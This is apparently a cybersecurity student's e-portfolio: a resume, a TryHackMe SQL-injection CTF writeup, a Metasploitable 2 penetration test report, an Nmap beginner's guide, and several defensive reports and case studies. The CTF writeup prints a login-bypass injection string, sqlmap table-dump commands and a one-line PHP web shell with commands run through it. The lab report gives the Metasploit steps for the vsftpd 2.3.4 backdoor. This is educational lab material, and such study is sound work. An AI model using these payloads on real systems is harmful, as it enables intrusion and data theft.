Resume

PRINCE DAMTE Alexandria, VA 22309 • (571) 458-9009 •  gilbertoppong248@gmail.com • LinkedIn: linkedin.com/in/princedamte


PROFESSIONAL SUMMARY

Cybersecurity undergraduate at Old Dominion University with hands-on experience in network security, penetration testing, and threat analysis. Proficient in Kali Linux, Nmap, Metasploit, Wireshark, and Python. Pursuing CompTIA Security+ and Microsoft certifications. Proven ability to work under pressure, communicate clearly, and solve complex problems. Seeking an entry-level SOC Analyst or cybersecurity role to apply academic and lab-developed skills in a professional environment.


EDUCATION

Bachelor of Science, Cybersecurity Old Dominion University — Norfolk, VA | Expected Dec 2026

  • Relevant Coursework: Networking Fundamentals, Linux/Windows System Administration, Information Security Principles, Python Programming, Cybersecurity Risk & Analysis, Incident Response
  • Leadership: Captain, Afro Simbas Dance Organization

CERTIFICATIONS & TRAINING

  • CompTIA Security+ — In Progress
  • Microsoft Security Certification — In Progress
  • TryHackMe — Active learner; completed rooms in web exploitation, network security, and Linux fundamentals

TECHNICAL SKILLS

Cybersecurity: Penetration Testing, Threat Analysis, Incident Response, Network Defense, Vulnerability Assessment Tools: Kali Linux, Nmap, Metasploit, sqlmap, Wireshark, Burp Suite (basic), John the Ripper Systems: Linux (Kali, Ubuntu), Windows, VMware/VirtualBox Networking: TCP/IP, VLANs, Firewalls, VPN, DNS, DHCP, Routing & Switching Programming: Python (scripting & automation), Bash Frameworks: NIST Cybersecurity Framework, PTES (Penetration Testing Execution Standard) Soft Skills: Problem-Solving, Technical Writing, Team Collaboration, Customer Support


WORK EXPERIENCE

Server | The Fairfax — Alexandria, VA | May 2021 – Present

  • Maintained accurate transaction records and documentation, mirroring log management and audit trail practices in cybersecurity operations.
  • Diagnosed and resolved operational issues efficiently in a high-pressure environment, demonstrating troubleshooting skills directly applicable to IT support and incident response.
  • Collaborated with diverse team members to maintain seamless operations, building communication skills essential for SOC and security team environments.
  • Managed multiple concurrent priorities with precision and reliability under time-sensitive conditions.

PROJECTS

Home Lab — Virtualized Security Environment

  • Built a virtualized network lab using VirtualBox to simulate real-world environments for practicing network configuration, penetration testing, and incident response scenarios.
  • Deployed Metasploitable 2 as a target system; performed full penetration test using Nmap, Metasploit, and manual exploitation techniques; documented findings in a professional report.

Web Exploitation — CTF Challenge (TryHackMe)

  • Completed a SQL injection and privilege escalation challenge; documented methodology including reconnaissance, exploitation, post-exploitation, and lessons learned in a formal writeup.

Wireshark Traffic Analysis

  • Captured and analyzed live network packet traffic to identify anomalies, unencrypted credentials, and potential indicators of compromise.

Python Automation Scripts

  • Developed Python scripts for file organization, basic system administration tasks, and network scanning automation.

Network Security Design Lab

  • Designed and configured a three-tier secure network architecture including perimeter firewall rules, VLAN segmentation, access controls, and intrusion detection — documented in a formal lab report.

LEADERSHIP & VOLUNTEER EXPERIENCE

  • Captain, Afro Simbas Dance Organization — Led and coordinated a student organization, managed event logistics, and developed team leadership and communication skills.
  • Community Volunteer — Assisted with maintaining organized community facilities; developed proactive problem-solving and service skills.
  • Former Competitive Soccer Player — Built discipline, persistence, and teamwork through years of competitive sport.

SKILL 3: ETHICAL HACKING & PENETRATION TESTING


Artifact 7 — CTF Writeup: Web Exploitation Challenge

Platform: TryHackMe Challenge Type: Web Exploitation / SQL Injection Difficulty: Medium Date: Summer 2024

Overview

This writeup documents my approach to a web exploitation challenge involving SQL injection and privilege escalation. The challenge required identifying a vulnerability in a login form, exploiting it to access a database, and using retrieved credentials to gain administrative access to the application.

Reconnaissance

I began by navigating to the challenge URL and examining the login page. Using browser developer tools, I inspected the page source and identified that the login form submitted a POST request to /login.php with parameters username and password.

I then ran a basic Nmap scan to identify open ports and services:

nmap -sV -p 80,443,8080 <target_ip>

Results showed port 80 open running Apache 2.4.29 on Ubuntu. No other relevant ports were open.

Identifying the Vulnerability

I tested the login form with a basic SQL injection payload:

Username: admin' --
Password: anything

The application returned a successful login response, confirming that the login form was vulnerable to SQL injection. The -- comment sequence was causing the password check to be ignored entirely.

Exploitation

Using sqlmap to automate further SQL injection testing:

sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" --dbs

This returned the database names present on the server. I then enumerated the tables in the target database:

sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" -D targetdb --tables

The users table was identified. Dumping its contents:

sqlmap -u "http://<target>/login.php" --data="username=admin&password=test" -D targetdb -T users --dump

This returned a table containing usernames and hashed passwords. The admin hash was cracked using a wordlist attack with John the Ripper, yielding the plaintext password.

Privilege Escalation

Logging in with the admin credentials revealed an administrative panel with file upload functionality. I tested whether the file upload validated file types by uploading a PHP web shell:

php

<?php system($_GET['cmd']); ?>

The upload was accepted. Navigating to the uploaded file’s URL and passing a command:

http://<target>/uploads/shell.php?cmd=id

Returned: uid=33(www-data). I now had remote code execution on the server.

Flag Retrieval

Using the web shell to navigate the file system, I located the flag file at /home/admin/flag.txt and retrieved it using:

http://<target>/uploads/shell.php?cmd=cat+/home/admin/flag.txt

Lessons Learned

This challenge reinforced several important principles:

  • SQL injection remains a critical vulnerability in web applications and is preventable through parameterized queries
  • File upload functionality must validate file type, not just extension
  • Defense in depth matters: even after gaining code execution, a properly configured web server would have limited what www-data could access
  • Methodical enumeration — checking each step before moving to the next — is more effective than rushing toward exploitation

Artifact 8 — Penetration Testing Lab Report

Target Environment: Metasploitable 2 (intentionally vulnerable VM) Testing Type: Internal network penetration test (simulated) Date: Summer 2024


Executive Summary

This report documents a penetration test conducted against a Metasploitable 2 virtual machine in a controlled lab environment. The assessment identified multiple critical vulnerabilities that would allow an unauthenticated attacker to gain full administrative control of the target system. All testing was conducted in an isolated lab environment with no impact on production systems.

Risk Rating: Critical


Scope and Methodology

Scope: Single target host — Metasploitable 2 VM (192.168.56.101) Methodology: PTES (Penetration Testing Execution Standard) Phases: Reconnaissance → Scanning → Exploitation → Post-Exploitation → Reporting


Reconnaissance

Passive reconnaissance confirmed the target IP and that the system was reachable on the local network. No external OSINT was conducted given the lab nature of the target.


Scanning and Enumeration

An Nmap scan revealed the following open ports and services:

nmap -sV -O -p- 192.168.56.101

Key findings:

PortServiceVersion
21FTPvsftpd 2.3.4
22SSHOpenSSH 4.7p1
23TelnetLinux telnetd
80HTTPApache 2.2.8
3306MySQL5.0.51a
5900VNCProtocol 3.3

The vsftpd 2.3.4 version is known to contain a backdoor vulnerability (CVE-2011-2523).


Exploitation

Vulnerability 1: vsftpd 2.3.4 Backdoor (CVE-2011-2523)

The vsftpd 2.3.4 backdoor is triggered by sending a username containing :) which causes the server to open a shell on port 6200.

Using Metasploit:

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.56.101
run

Result: Root shell obtained immediately. No credentials required.

Vulnerability 2: Telnet with Default Credentials

Telnet was accessible with the default credentials msfadmin:msfadmin, providing a second avenue for administrative access.


Post-Exploitation

With root access established, the following post-exploitation activities were performed:

  • Confirmed root privileges with id command
  • Retrieved /etc/passwd and /etc/shadow for offline password cracking (simulated)
  • Demonstrated ability to create new user accounts
  • Confirmed access to MySQL database with default root credentials (no password)

Findings Summary

FindingSeverityCVE
vsftpd 2.3.4 backdoorCriticalCVE-2011-2523
Telnet enabled with default credentialsCriticalN/A
MySQL accessible with no root passwordCriticalN/A
SSH running outdated versionHighMultiple
VNC accessible without authenticationCriticalN/A

Recommendations

  1. Replace vsftpd 2.3.4 immediately with a current, supported version
  2. Disable Telnet and use SSH exclusively for remote administration
  3. Set a strong password for the MySQL root account and restrict remote access
  4. Update all services to current supported versions
  5. Implement host-based firewall rules to restrict access to sensitive ports

Conclusion

The Metasploitable 2 system is intentionally vulnerable and serves as a valuable learning environment. In a real-world context, the vulnerabilities identified here would represent an unacceptable risk. This assessment demonstrates the value of regular penetration testing: vulnerabilities that are known and documented can be remediated; vulnerabilities that are undiscovered cannot.


Artifact 9 — NEW ARTIFACT: Beginner’s Guide to Nmap for Cybersecurity Students

Type: Original Educational Resource Created for: IDS E-Portfolio Project Date: Fall 2024


Introduction

If you are just beginning your journey in cybersecurity, you will encounter Nmap within your first few weeks. Nmap (Network Mapper) is a free, open-source tool used for network discovery and security auditing. It is one of the most widely used tools in the field — used by penetration testers, SOC analysts, network administrators, and security researchers every day.

This guide is written for students who have never used Nmap before. By the end, you will understand what Nmap does, how to run basic scans, how to interpret the results, and how to use that information in a security context.


What Does Nmap Do?

Nmap sends specially crafted packets to a target system and analyzes the responses. From those responses, it can determine:

  • Which hosts are online on a network
  • Which ports are open on those hosts
  • What services are running on those ports
  • What operating system a host is likely running

This information is foundational to both attacking and defending networks. A penetration tester uses Nmap to understand a target before attempting exploitation. A defender uses it to audit their own network and make sure only expected services are exposed.


Installing Nmap

Nmap is pre-installed on Kali Linux. If you are using another system:

Linux (Debian/Ubuntu):

sudo apt-get install nmap

Windows: Download the installer from https://nmap.org/download.html

Mac:

brew install nmap

Your First Scan: Ping Sweep

A ping sweep tells you which hosts are alive on a network. This is usually the first thing you do when assessing a network.

nmap -sn 192.168.1.0/24

The -sn flag means “scan for hosts only, no port scan.” The /24 means you are scanning all 256 addresses in the 192.168.1.x range.

Example output:

Nmap scan report for 192.168.1.1
Host is up (0.0034s latency).
Nmap scan report for 192.168.1.105
Host is up (0.0021s latency).

This tells you that two hosts are online: the router (1.1) and one other device (1.105).


Port Scanning Basics

Once you know a host is alive, you want to know what ports are open. Open ports mean running services. Running services are potential entry points.

Basic TCP scan:

nmap 192.168.1.105

By default, Nmap scans the 1,000 most common ports.

Scan all 65,535 ports:

nmap -p- 192.168.1.105

Scan specific ports:

nmap -p 22,80,443,3389 192.168.1.105

Service and Version Detection

Knowing a port is open is useful. Knowing what is running on that port is more useful.

nmap -sV 192.168.1.105

The -sV flag attempts to determine the service name and version number for each open port.

Example output:

PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh      OpenSSH 7.4
80/tcp  open   http     Apache httpd 2.4.29
3306/tcp open  mysql    MySQL 5.7.30

This tells you exactly what is running. You can now research whether any of these specific versions have known vulnerabilities.


Operating System Detection

nmap -O 192.168.1.105

Nmap will attempt to fingerprint the operating system based on how the target responds to certain probes. This is not always 100% accurate, but it is a useful starting point.


Putting It Together: A Comprehensive Scan

For most learning scenarios, this command gives you a thorough picture:

nmap -sV -O -A 192.168.1.105

The -A flag enables aggressive scanning: OS detection, version detection, script scanning, and traceroute. Be aware that aggressive scans generate more network traffic and are more likely to be detected by security tools.


Reading Nmap Output

Every Nmap scan result has a few key fields:

  • PORT: The port number and protocol (e.g., 80/tcp)
  • STATE: open, closed, or filtered
    • Open = something is listening here
    • Closed = port is reachable but nothing is listening
    • Filtered = a firewall may be blocking the probe
  • SERVICE: The name of the expected service for that port
  • VERSION: The specific software version (with -sV)

Legal and Ethical Reminder

Nmap is a powerful tool. Only scan systems you own or have explicit written permission to scan. Scanning systems without permission is illegal in most jurisdictions and can result in serious consequences. In a learning context, always use dedicated lab environments like Metasploitable VMs, TryHackMe rooms, or Hack The Box machines.


Next Steps

Once you are comfortable with Nmap, explore:

  • Nmap Scripting Engine (NSE): Automates advanced tasks like vulnerability detection
  • Zenmap: A graphical interface for Nmap, good for visualizing results
  • Wireshark: Packet capture tool that complements Nmap by letting you see the actual traffic
  • Metasploit: Use Nmap findings as input for exploitation in lab environments

Conclusion

Nmap is one of the first tools you will learn and one of the last tools you will stop using. Its simplicity is deceptive — behind a few command-line flags is a remarkably powerful capability to understand any network you are authorized to assess. Practice it regularly, document your results carefully, and always work ethically. The foundation you build with Nmap will serve your entire cybersecurity career.

SKILL 2: THREAT ANALYSIS & INCIDENT RESPONSE


Artifact 4 — Threat Analysis Report: Phishing Campaign Targeting Corporate Email

Course Context: Cyber Threat Intelligence Date: Spring 2024

Executive Summary

This report analyzes a spear-phishing campaign identified targeting employees of mid-sized financial services organizations. The campaign used carefully crafted emails impersonating internal IT departments to harvest employee credentials. This analysis covers the attack methodology, indicators of compromise, threat actor assessment, and recommended mitigations.

Threat Overview

Threat Type: Spear-phishing / Credential harvesting Target Sector: Financial services Likely Motivation: Financial gain / Initial access for follow-on attack Sophistication Level: Moderate to high

Attack Methodology

The campaign followed a structured attack chain:

Phase 1 — Reconnaissance Attackers gathered employee information from LinkedIn and company websites to identify targets with access to financial systems. Job titles such as “Accounts Payable Specialist” and “Finance Manager” were specifically targeted.

Phase 2 — Email Crafting Phishing emails were sent from domains that closely resembled legitimate company domains (e.g., company-it-support.com vs. company.com). Emails warned recipients that their passwords were expiring and directed them to click a link to update their credentials.

Phase 3 — Credential Harvesting The link directed users to a convincing replica of the company’s login portal. Credentials entered on the page were captured and transmitted to attacker-controlled infrastructure.

Phase 4 — Account Exploitation Harvested credentials were used to access email accounts, from which attackers sought financial information, wire transfer instructions, and contact lists for further targeting.

Indicators of Compromise (IOCs)

  • Sending domains: company-it-helpdesk[.]com, it-support-portal[.]net
  • Subject lines: “Action Required: Password Expiration Notice,” “Immediate Action: Account Security Alert”
  • Phishing page IP: 185.234.xx.xx (hosted on bulletproof hosting provider)
  • User-agent string associated with credential harvesting tool

Threat Actor Assessment

Based on the targeting pattern, infrastructure characteristics, and techniques used, this campaign is consistent with financially motivated threat actors operating in Eastern Europe. The use of bulletproof hosting and the targeting of finance personnel is consistent with Business Email Compromise (BEC) groups documented by the FBI’s Internet Crime Complaint Center (IC3).

Recommended Mitigations

  1. Implement multi-factor authentication on all email accounts immediately
  2. Deploy email filtering solutions with domain similarity detection
  3. Conduct employee security awareness training with emphasis on phishing recognition
  4. Implement DMARC, DKIM, and SPF email authentication protocols
  5. Monitor for login attempts from unusual geographic locations or IP addresses

Artifact 5 — Incident Response Plan: Ransomware Incident

Course Context: Incident Response and Digital Forensics Date: Spring 2024

Purpose

This Incident Response Plan (IRP) provides structured guidance for responding to a ransomware incident affecting organizational systems. It is designed to minimize damage, preserve evidence, restore operations, and prevent recurrence.

Incident Response Team

RoleResponsibility
Incident Response LeadOverall coordination and decision-making
Security AnalystTechnical investigation and containment
IT OperationsSystem isolation and recovery
Legal/ComplianceRegulatory notification and documentation
Communications LeadInternal and external communications

Phase 1 — Detection and Identification

Triggers that may indicate ransomware:

  • Files with unfamiliar extensions appearing on shared drives
  • Ransom note files appearing on desktops or shared folders
  • Sudden inability to open files
  • Unusual encryption activity detected by endpoint security tools
  • Help desk calls from multiple users reporting the same issue

Immediate Actions:

  1. Document the time, date, and nature of the alert
  2. Identify affected systems and users
  3. Preserve logs from affected systems before any remediation
  4. Notify the Incident Response Lead immediately

Phase 2 — Containment

Short-term containment (within 1 hour):

  1. Isolate affected systems from the network by disabling network interfaces or physically disconnecting network cables
  2. Do NOT power off affected systems — live memory may contain decryption keys or attacker artifacts
  3. Block identified malicious IP addresses and domains at the firewall
  4. Disable affected user accounts to prevent further spread via compromised credentials

Long-term containment:

  1. Identify the initial infection vector (phishing email, exposed RDP, vulnerable software)
  2. Patch or remediate the identified vulnerability
  3. Scan all systems for indicators of compromise

Phase 3 — Eradication

  1. Identify all systems affected by the ransomware
  2. Remove malware using endpoint security tools and manual remediation
  3. Rebuild systems from known-good images where full eradication cannot be confirmed
  4. Reset all passwords, prioritizing accounts with elevated privileges

Phase 4 — Recovery

  1. Restore data from clean backups verified to predate the infection
  2. Bring systems back online in a staged manner, monitoring closely for signs of reinfection
  3. Verify system integrity before restoring to production status
  4. Document all actions taken during recovery

Phase 5 — Post-Incident Review

Within two weeks of incident closure:

  1. Conduct a lessons-learned meeting with all incident response team members
  2. Document a timeline of the incident from initial compromise to full recovery
  3. Identify security control gaps that enabled the incident
  4. Update this IRP based on findings
  5. Submit required regulatory notifications (if applicable under HIPAA, PCI-DSS, state breach notification laws, etc.)

Artifact 6 — Case Study: The WannaCry Ransomware Attack of 2017

Course Context: Cybersecurity Policy and Law Date: Fall 2023

Introduction

The WannaCry ransomware attack of May 2017 infected more than 200,000 systems across 150 countries within a single day, causing an estimated $4–8 billion in damages. It remains one of the most consequential cyberattacks in history and offers critical lessons for security analysts and incident responders. This case study examines the attack’s technical mechanics, its organizational impact, and the policy implications it raised.

Technical Analysis

WannaCry exploited EternalBlue, a vulnerability in Microsoft’s SMB (Server Message Block) protocol. EternalBlue had been developed by the NSA as a cyberweapon and was leaked by a hacking group called Shadow Brokers in April 2017 — just weeks before WannaCry emerged. Microsoft had released a patch (MS17-010) in March 2017, but millions of systems worldwide had not applied it.

The ransomware spread autonomously through networks without requiring any user interaction — unlike phishing-based ransomware, WannaCry could self-propagate by scanning for vulnerable SMB ports (port 445) and exploiting them directly. Once a system was infected, files were encrypted and a ransom demand of $300–600 in Bitcoin was displayed.

Organizational Impact

The UK’s National Health Service (NHS) was among the hardest-hit organizations, with approximately 80 of 236 NHS trusts affected. Operations were disrupted, appointments cancelled, and some hospitals diverted emergency patients. The attack exposed how deeply healthcare organizations had come to rely on legacy systems — many NHS computers were running Windows XP, which Microsoft had ceased supporting in 2014.

Why It Spread So Far

Several factors enabled WannaCry’s unprecedented spread:

  1. Unpatched systems: Many organizations had not applied the available MS17-010 patch
  2. Legacy systems: Healthcare, utilities, and government agencies often run outdated systems that cannot be patched without disrupting operations
  3. Flat network architectures: Many organizations lacked internal network segmentation, allowing the worm to spread freely once inside the perimeter
  4. No kill switch awareness: A security researcher accidentally discovered a kill switch domain in the malware’s code and registered it, slowing the spread — but many organizations had already been infected

Lessons for Incident Responders

  1. Patch management is a non-negotiable security control — the WannaCry patch was available weeks before the attack
  2. Network segmentation limits the blast radius of self-propagating malware
  3. Legacy systems represent a systemic vulnerability that requires dedicated risk management strategies
  4. Incident response plans must account for scenarios where normal communication channels (email, shared drives) may be compromised

Conclusion

WannaCry was not a sophisticated attack. It succeeded because of accumulated organizational failures — outdated systems, poor patch management, and inadequate segmentation. Its lesson is not primarily technical: it is a lesson about the organizational commitment required to maintain a meaningful security posture.

E-Portfolio Artifacts

Prince Damte | Cybersecurity


SKILL 1: NETWORK SECURITY & DEFENSE


Artifact 1 — Network Design and Configuration Lab Report

Course Context: Network Security Fundamentals Date: Spring 2024

Overview

This lab report documents the design and configuration of a secure small-business network environment. The objective was to build a network architecture that minimizes attack surface, enforces access controls, and demonstrates core defensive security principles.

Network Design

The network was designed using a three-tier architecture: an external perimeter zone, a demilitarized zone (DMZ), and an internal trusted network. This separation ensures that publicly accessible services (web server, email server) are isolated from internal systems containing sensitive data.

Network Diagram Summary:

  • External Zone: Connects to the internet via ISP router
  • Perimeter Firewall: Filters all inbound and outbound traffic using stateful packet inspection
  • DMZ: Houses the web server (192.168.2.10) and mail server (192.168.2.11)
  • Internal Network: Hosts workstations (192.168.1.0/24) and file server (192.168.1.100)
  • Internal Firewall: Provides second layer of protection between DMZ and internal network

Configuration Steps

Step 1 — Firewall Rules (Perimeter) The perimeter firewall was configured with the following rules:

  • Allow inbound HTTP (port 80) and HTTPS (port 443) to DMZ web server only
  • Allow inbound SMTP (port 25) to DMZ mail server only
  • Deny all other inbound traffic by default
  • Allow all outbound traffic from internal network
  • Log all denied connection attempts

Step 2 — VLAN Segmentation VLANs were configured on the internal switch to separate:

  • VLAN 10: Administrative workstations
  • VLAN 20: General staff workstations
  • VLAN 30: Server VLAN (file server, internal DNS)

Inter-VLAN routing was restricted so that general staff could not access the administrative VLAN without explicit firewall rules permitting it.

Step 3 — Access Control

  • All administrative accounts required strong passwords (minimum 14 characters, complexity enforced)
  • Remote access to network devices was restricted to SSH only; Telnet was disabled
  • SNMP community strings were changed from default values
  • Unused ports on switches were disabled and assigned to an unused VLAN

Step 4 — Intrusion Detection A host-based intrusion detection system (HIDS) was installed on the file server to monitor for unusual file access patterns, privilege escalation attempts, and unauthorized login attempts.

Testing and Validation

After configuration, the network was tested using the following methods:

  • Port scanning with Nmap to verify that only expected ports were open from the external zone
  • Attempted lateral movement from the general staff VLAN to the administrative VLAN (blocked successfully)
  • Simulated brute-force login attempt against the file server (HIDS alert triggered successfully)

Lessons Learned

This lab reinforced the principle of defense in depth — the idea that no single security control is sufficient and that layered defenses create meaningful barriers even when individual controls are bypassed. I also learned that documentation is inseparable from good security practice: a network that is configured correctly but not documented is nearly impossible to maintain or audit.


Artifact 2 — Secure Network Policy: Small Business Security Policy Document

Course Context: Information Security Policy and Management Date: Fall 2023

Purpose

This policy document establishes the minimum security standards for the internal network of a fictional small business, Meridian Consulting Group. It is intended to guide administrators, employees, and contractors in the secure use of organizational technology resources.

Scope

This policy applies to all employees, contractors, and third-party vendors who access Meridian Consulting Group’s network resources, whether on-premises or remotely.

Acceptable Use Policy

  1. Network resources are to be used for business purposes only. Personal use is permitted on a limited basis provided it does not consume excessive bandwidth or expose the network to risk.
  2. Users must not attempt to access systems, files, or data for which they have not been granted explicit authorization.
  3. Installation of unauthorized software on company devices is prohibited.
  4. All work-related data must be stored on company-approved systems. Personal cloud storage (personal Google Drive, Dropbox, etc.) must not be used for company data.

Password Policy

  • Minimum password length: 12 characters
  • Passwords must include uppercase letters, lowercase letters, numbers, and special characters
  • Passwords must be changed every 90 days
  • Password reuse is prohibited for the last 10 passwords
  • Multi-factor authentication (MFA) is required for all remote access and all administrative accounts

Network Access Controls

  • All devices connecting to the internal network must be registered with the IT department
  • Guest Wi-Fi is provided on a separate network segment with no access to internal resources
  • Remote access is permitted via VPN only, using certificate-based authentication
  • Inactive VPN sessions will time out after 30 minutes

Incident Reporting

All employees are required to report suspected security incidents immediately to the IT security team. Incidents include but are not limited to:

  • Receiving suspicious emails or phishing attempts
  • Noticing unusual behavior on a company device
  • Losing or having a company device stolen
  • Accidentally disclosing login credentials

Compliance

This policy is aligned with the NIST Cybersecurity Framework (NIST, 2018) and will be reviewed annually. Non-compliance may result in disciplinary action up to and including termination.

References

National Institute of Standards and Technology. (2018). Framework for improving critical infrastructure cybersecurity (Version 1.1)https://www.nist.gov/cyberframework


Artifact 3 — Network Breach Case Study: The Target Data Breach of 2013

Course Context: Cybersecurity Risk and Analysis Date: Fall 2023

Introduction

The 2013 Target Corporation data breach remains one of the most instructive case studies in network security failure. Over a period of approximately three weeks during the holiday shopping season, attackers accessed the payment card data of approximately 40 million customers and the personal information of an additional 70 million. This case study examines how the breach occurred, what network security failures enabled it, and what lessons can be drawn for security practitioners.

How the Breach Occurred

The attack began with a phishing email sent to employees of Fazio Mechanical, an HVAC vendor that had network access to Target’s systems for the purpose of electronic billing and project management. When a Fazio employee clicked on a malicious link, attackers gained credentials that allowed them to access Target’s vendor portal.

From the vendor portal, the attackers were able to move laterally through Target’s network — a movement that should have been prevented by network segmentation controls. Target’s network allowed a third-party vendor with billing access to reach systems far beyond what was necessary for their business function. This violation of the principle of least privilege was the critical enabling failure.

Once inside the broader network, attackers installed malware on Target’s point-of-sale (POS) systems. This malware scraped payment card data from memory as cards were swiped, a technique known as RAM scraping. The stolen data was then aggregated on a server within Target’s network before being exfiltrated to external servers.

Security Failures Identified

1. Inadequate Network Segmentation The vendor network should have been strictly isolated from payment systems. A properly segmented network would have prevented lateral movement from a vendor portal to POS infrastructure.

2. Failure to Act on Alerts Target had deployed a security monitoring tool (FireEye) that generated alerts when the malware was installed. Security staff reportedly reviewed and dismissed these alerts. This represents a failure of incident response process, not just technology.

3. Third-Party Risk Management Target failed to adequately assess and control the security posture of its vendors. Third-party access was granted without sufficient controls or monitoring.

Lessons for Security Practitioners

  1. Network segmentation must be enforced rigorously, especially for third-party access
  2. Security alerts require defined escalation procedures — technology alone is insufficient
  3. Third-party risk management is an essential component of network security
  4. The principle of least privilege must be applied to all accounts, including vendor accounts

Conclusion

The Target breach illustrates that network security failures are rarely purely technical. They involve process failures, organizational decisions, and human behavior. A comprehensive security posture requires attention to all of these dimensions simultaneously.

Reflection Essay: Skills, Artifacts, and the Making of a Cybersecurity Professional.

By Prince Damte


Introduction

When I began my interdisciplinary studies program, I did not yet have the language to describe what I was becoming. I knew I was interested in technology. I knew I had moved from Ghana to the United States with a hunger to build something meaningful from my education. But it was not until I began connecting coursework across disciplines — writing, critical thinking, ethics, information technology, and security — that I understood what kind of professional I was training to be. This portfolio represents the convergence of those disciplines into three marketable skills: network security and defense, threat analysis and incident response, and ethical hacking and penetration testing. These skills did not emerge from technical courses alone. They were shaped by the full breadth of my interdisciplinary education, and this essay reflects on how that happened — artifact by artifact, course by course, experience by experience.


Skill One: Network Security & Defense

Artifact 1 — Network Design and Configuration Lab

My first serious encounter with network security came through a lab assignment that required me to design and configure a secure network environment. Before that course, I understood networks abstractly — as systems that connected devices and passed information. The lab forced me to think concretely: Where are the vulnerabilities? How do you segment a network to limit the damage of a breach? What does a properly configured firewall actually look like in practice?

Working through that assignment was difficult in ways I did not anticipate. The technical configuration was challenging, but what surprised me more was how much writing and communication mattered. I had to document every decision I made — why I chose certain configurations, what risks I was mitigating, what I would do differently if the environment changed. That documentation process, which I initially viewed as a formality, turned out to be one of the most valuable parts of the exercise. It forced me to articulate my reasoning, which deepened my understanding of the technical choices themselves. Courses in technical writing and communication, which I had taken as part of my interdisciplinary requirements, turned out to be directly applicable here in ways I had not foreseen (Nakamura & Zlatin, 2020).

Artifact 2 — Secure Network Policy Paper

The second artifact for this skill came from a course that asked me to move beyond configuration and into policy. A network is only as secure as the rules governing its use, and writing a comprehensive network security policy required me to think like an administrator, a risk manager, and a communicator simultaneously. I had to understand not just the technical landscape but the human one — the ways that users interact with systems, the mistakes they make, the behaviors that create vulnerabilities even in well-configured environments.

This assignment drew on my studies in organizational behavior and ethics as much as it drew on my technical knowledge. The National Institute of Standards and Technology (NIST) framework, which I referenced extensively, provided a structure for thinking about security policy that was both rigorous and practical (NIST, 2018). Learning to work within established frameworks — rather than inventing solutions from scratch — was itself an important lesson. It is one that I have seen reinforced in every cybersecurity job advertisement I have reviewed: employers want professionals who understand industry standards, not just individuals who can think independently.

Artifact 3 — Network Breach Case Study

For my third artifact in this skill area, I analyzed a real-world network breach — examining what went wrong, how it could have been prevented, and what the response revealed about the organization’s security posture. This case study approach, which I encountered first in my social sciences coursework, turned out to be a powerful tool for understanding cybersecurity failures. Breaches are rarely purely technical events. They are organizational failures, communication failures, and sometimes policy failures, wrapped in technical packaging.

Writing this case study required me to synthesize information from multiple sources, evaluate competing explanations, and arrive at conclusions that were supported by evidence — skills that my interdisciplinary writing courses had been building all along. The experience confirmed something I now believe deeply: cybersecurity professionals who can only think technically are less effective than those who can also think analytically and communicate clearly (Klein, 2021).


Skill Two: Threat Analysis & Incident Response

Artifact 4 — Threat Analysis Report

Threat analysis is, at its core, an exercise in structured thinking. You are presented with incomplete information and asked to determine what is happening, what might happen next, and what should be done about it. My threat analysis report — which focused on a phishing campaign targeting organizational email systems — required exactly this kind of thinking. I had to move from raw indicators of compromise to a coherent narrative about the threat actor’s likely methods and objectives.

This artifact pushed me to integrate knowledge from my psychology coursework in ways I did not expect. Understanding why phishing works — why humans click on malicious links even when they know better — requires an understanding of cognitive biases, social engineering, and decision-making under uncertainty. The interdisciplinary lens I had developed through my program made me a more complete analyst. A purely technical analysis of a phishing campaign misses half the picture (Workman, 2008).

Artifact 5 — Incident Response Plan

An incident response plan is a document that organizations hope they never have to use — but that they desperately need when something goes wrong. Creating one from scratch was one of the most demanding assignments I completed, not because the technical components were beyond me, but because the document had to be usable by people under stress, in real time, with incomplete information. Clarity, structure, and precision in writing were not optional. They were the point.

My coursework in technical communication directly shaped how I approached this document. I learned to use plain language, logical sequencing, and clear headings — not as stylistic choices, but as functional necessities. The Cybersecurity and Infrastructure Security Agency (CISA) guidelines on incident response provided an important framework that I adapted for the specific organizational context I was working within (CISA, 2021). Reviewing SOC analyst job descriptions while preparing this portfolio, I noticed that incident response planning is listed as a required competency in nearly every posting. This artifact is direct evidence that I can do that work.

Artifact 6 — Cyberattack Case Study

My second case study examined a major ransomware attack, tracing its origins, progression, and organizational impact. This artifact sits at the intersection of technical analysis and policy thinking — understanding not just how the malware behaved, but why the organization was vulnerable, how the response unfolded, and what systemic changes followed. It is the kind of analysis that a SOC analyst must be capable of performing quickly, under pressure, and with high accuracy.

Writing this case study reinforced my understanding of interdisciplinarity as a professional asset. The most complete analyses of cyberattacks draw on computer science, organizational theory, law, and communication. My program gave me exposure to all of these domains, and this artifact reflects that breadth (Rid & Buchanan, 2015).


Skill Three: Ethical Hacking & Penetration Testing

Artifact 7 — CTF Writeup

Capture the Flag competitions were my introduction to offensive security thinking, and they remain some of the most valuable learning experiences I have had. A CTF writeup documents not just what I did, but how I thought — what tools I chose, what approaches I tried, what failed, and what ultimately worked. Writing a clear and thorough writeup after a challenge is itself a skill: it requires me to reconstruct my reasoning and explain it to an audience that was not there with me.

My experience with Kali Linux and Python gave me the technical foundation for CTF participation, but the writing skills I developed through my interdisciplinary coursework made my writeups genuinely useful documents rather than just personal notes. I have learned that in professional penetration testing, the report is often more important than the test itself — because the report is what communicates findings to the people who need to act on them (Engebretson, 2013).

Artifact 8 — Penetration Testing Lab Report

Structured penetration testing follows a professional methodology: scoping, reconnaissance, exploitation, post-exploitation, and reporting. My lab report, produced from a controlled environment using industry-standard tools, walks through each of these phases for a simulated target system. The technical work was engaging and challenging. The reporting work was equally demanding.

This artifact demonstrates something that I believe sets me apart as an emerging professional: I can do the technical work, and I can write about it in a way that non-technical stakeholders can understand. That combination — technical depth plus communication skill — is something that interdisciplinary education builds in ways that purely technical programs often do not. Job advertisements for penetration testers consistently list report writing as a required skill alongside tool proficiency. My portfolio demonstrates both.

Artifact 9 — Nmap Beginner’s Guide (New Artifact)

For my new artifact, I created a practical beginner’s guide to Nmap, one of the most widely used tools in network scanning and penetration testing. This guide was written for an audience of students just beginning their cybersecurity journey — people where I was not long ago. Writing for a beginner audience required me to strip away jargon, build concepts from the ground up, and sequence information in a way that builds understanding progressively.

